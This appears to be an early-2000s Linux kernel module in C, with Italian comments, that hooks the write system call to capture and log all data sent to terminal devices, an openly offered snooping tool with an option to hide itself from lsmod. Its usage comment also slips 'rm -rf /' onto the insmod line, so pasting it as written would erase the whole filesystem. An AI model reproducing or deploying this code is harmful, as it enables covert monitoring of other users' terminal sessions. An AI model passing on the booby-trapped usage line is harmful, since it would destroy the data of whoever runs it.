/*
 *  Moj0_lkm.c  <del tipo: vediamo come cazzeggia un utente...>
 *
 *  this lkm intercept the sys_call write and stamp the buffer (the 
 *  second arg of the SYS_write)...
 *  If a paranoic admin wants to control his box & his local connections, 
 *  he can insmod Moj0_lkm: in real time, he'll see what happen on his 
 *  box...
 *  
 *  [Pensate poi voi alle possibilita' che avete, e codate il vostro bel
 *  pensierino, che non vi fa male...]
 *  
 *  date: 30.Ago.2001, un ottima e sciroccosa serata d'estate...
 *  
 *	thnx: vecna, FuSyS, pIGpEN, LORdBUFfY for their sources...
 *	      ELeN, S... for the moral support ;) 
 *	      Jeff Buckley <Moj0 PiN> for his beautiful music...
 *	      
 *  to compile: make ;)
 *  to run: a) make up 
 *             [if you want to delete your presence to lsmod and load
 *              the module automatically...]
 *          b) insmod Moj0_lkm.o [log=<log_file_name>] | rm -rf /
 *             [if you want to specify the log filename...]
 *
 *  b0Ys: ENjOY...
 *
 *	                                                   uLiX  <uLiX@gmx.it>
 */


#ifdef MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/module.h>
#include <linux/kernel.h>

#include <linux/types.h>
#include <linux/stat.h>
#include <linux/sched.h>
#include <linux/kdev_t.h>

#include <asm/uaccess.h>
#include <asm/unistd.h>

#include <sys/syscall.h>
#include <linux/smp_lock.h>

#define LKM "Moj0_lkm"
#define MAJ  4          /*** major number /dev/ttyN ***/
#define LEN  126

extern void *sys_call_table[];

static asmlinkage int (*orig_write) (unsigned int fd, char *buf, size_t cnt);
static asmlinkage int new_write (unsigned int fd, char *buf, size_t cnt);

void write_log (kdev_t rdev, char *buf, unsigned int bytes);

char *log = "/dev/tty12";      /*** default ***/

MODULE_PARM(log, "s");


static asmlinkage int new_write (unsigned int fd, char *buf, size_t cnt)
{
	struct file *file;
	struct dentry *dentry;
	struct inode *inode;

	kdev_t rdev;	
	int size = 0;

	file = current->files->fd[fd];

	if (file && !IS_ERR(file)) {
		rdev = file->f_dentry->d_inode->i_rdev;
		if (MAJOR(rdev) == MAJ) {
			size = (*orig_write)(fd, buf, cnt);
			if (size > 0)
				write_log(rdev, buf, cnt);
			return size;
		}
	}
	return (*orig_write)(fd, buf, cnt);
}

void write_log (kdev_t rdev, char *buf, unsigned int bytes)
{
	struct file *file;
	mm_segment_t fs;

	char buffer[LEN];
	kdev_t current_rdev = rdev;
	static kdev_t prev_rdev;

	fs = get_fs();
	set_fs(KERNEL_DS);
	
	file = filp_open(log, O_APPEND|O_WRONLY|O_CREAT, 0);

#ifdef DEBUG
	printk(KERN_INFO "%s: filp_open %s ok...\n", LKM, log);
#endif
	
	if (IS_ERR(file)) {
#ifdef DEBUG
		printk(KERN_INFO "%s: IS_ERR <%s>\n", LKM, log);
#endif
		return;
	}

	if (!(file->f_op) || !(file->f_op->write)) {
#ifdef DEBUG
		printk(KERN_INFO "%s: invalid inode on <%s>\n", LKM, log);
#endif
		return;
	}
	
	if (prev_rdev != current_rdev) {
		sprintf(buffer, "\n\n---[ %s: dATA RECiEVEd fROM tty%x\n\n",
														LKM, MINOR(rdev));
		(file->f_op->write)(file, buffer, strlen(buffer), &(file->f_pos));
		prev_rdev = current_rdev;
	}
	
	(file->f_op->write)(file, buf, bytes, &(file->f_pos));

#ifdef DEBUG
	printk(KERN_INFO "%s: data written to file %s ok...\n", LKM, log);
#endif

	set_fs(fs);
	
	filp_close(file, NULL);

#ifdef DEBUG
	printk(KERN_INFO "%s: filp_close %s ok...\n", LKM, log);
#endif
	
}

int init_module (void) 
{
	lock_kernel();
		
	EXPORT_NO_SYMBOLS;

	orig_write = sys_call_table[SYS_write];
	sys_call_table[SYS_write] = new_write;

#ifdef DEBUG	
	printk(KERN_INFO "%s caricato...\n", LKM);	
	printk(KERN_INFO "%s: data on %s...\n", LKM, log);
#endif	

	unlock_kernel();
	
	return 0;
}

void cleanup_module (void)
{
	lock_kernel();
	
	sys_call_table[SYS_write] = orig_write;

#ifdef DEBUG	
	printk(KERN_INFO "%s rimosso...\n", LKM);
#endif

	unlock_kernel();
}
